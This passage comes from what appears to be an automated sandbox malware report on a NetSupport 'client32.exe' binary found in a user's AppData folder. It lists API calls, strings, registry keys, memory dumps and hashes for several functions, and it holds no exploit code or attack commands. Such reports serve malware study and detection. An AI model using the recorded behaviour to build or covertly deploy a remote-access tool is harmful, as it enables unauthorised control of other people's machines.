                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                              • FindCloseChangeNotification.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
                                                                              • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                              • API String ID: 2579639479-1136101629
                                                                              • Opcode ID: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                              • Instruction ID: 76930d23ba1481c48ceb924dc08d7adf498fcac35268297604c83f904cd53e19
                                                                              • Opcode Fuzzy Hash: 4687833a1936dd26f91b2846a9cb7115301389be075d2048120d977a93bdefe6
                                                                              • Instruction Fuzzy Hash: A0018435780715BFF3208EA5CD85F57FBA9DB45765F104138FA259B6C4D670E8048BA0
                                                                              Function 11032020 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: %s%s%s.bin$562258$_HF$_HW$_SW
                                                                              • API String ID: 2111968516-3988310630
                                                                              • Opcode ID: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                              • Instruction ID: fa910be19caf0a14a4f119543ead50e584fafd0cecff00e00c2366bf95bcdf21
                                                                              • Opcode Fuzzy Hash: 503f2c815b640c3d0002ea6c51c91ecd6f409461de15ff16a7ff97f3048ceaf6
                                                                              • Instruction Fuzzy Hash: 2AE092A4E5460C9BF300A6498C11BAAFACC174475BFC4C051BFF9AB6A3E9299904C6D2
                                                                              Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                              • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                              • RegisterClassA.USER32(?), ref: 111036EF
                                                                              • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                              • String ID: NSMDesktopWnd
                                                                              • API String ID: 2669163067-206650970
                                                                              • Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                              • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                              • Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                              • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                              Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                              • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpen
                                                                              • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                              • API String ID: 47109696-3245241687
                                                                              • Opcode ID: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                              • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                              • Opcode Fuzzy Hash: a2c2ae4e5c4c2a275a787743371364b614ebaa02131a0ba05eddfad67ef0d136
                                                                              • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                              Function 111121E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
                                                                                • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
                                                                              • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                              • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                              • API String ID: 806825551-1858614750
                                                                              • Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                              • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                              • Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                              • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
                                                                              Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
                                                                              • ResetEvent.KERNEL32(0000026C), ref: 11144E39
                                                                              • SetEvent.KERNEL32(0000026C), ref: 11144E4F
                                                                              • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                              • String ID: MiniDump
                                                                              • API String ID: 1494854734-2840755058
                                                                              • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                              • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                              • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                              • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                              Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
                                                                              • wsprintfA.USER32 ref: 11147A16
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                              • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                              • API String ID: 1985783259-2296142801
                                                                              • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                              • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                              • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                              • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                              Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • _memset.LIBCMT ref: 11110207
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                              • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                              • API String ID: 3234921582-2664294811
                                                                              • Opcode ID: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                              • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                              • Opcode Fuzzy Hash: cdd1c54386482822face1726c8a555e59ef6984596166c085d167c5bbae17b0a
                                                                              • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                              Function 111466B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,75BF8400), ref: 11145CA0
                                                                                • Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
                                                                                • Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
                                                                                • Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA
                                                                              • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030D50,00000002), ref: 111466CF
                                                                              • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 111466E1
                                                                              • FreeLibrary.KERNEL32(00000000,?,11030D50,00000002), ref: 111466F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                              • String ID: SetProcessDpiAwareness$shcore.dll
                                                                              • API String ID: 1108920153-1959555903
                                                                              • Opcode ID: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                              • Instruction ID: b4913e853cd1401fb26aad2e9137c069c6cdc321efb83b495f2c8eb55c4c44ed
                                                                              • Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                              • Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
                                                                              Function 11031F30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11031FE6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                              • String ID: %s%s.bin$562258$clientinv.cpp$m_pDoInv == NULL
                                                                              • API String ID: 4180936305-24552472
                                                                              • Opcode ID: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                              • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
                                                                              • Opcode Fuzzy Hash: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                              • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                              Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                              • __strdup.LIBCMT ref: 11145277
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                              • _free.LIBCMT ref: 111452AC
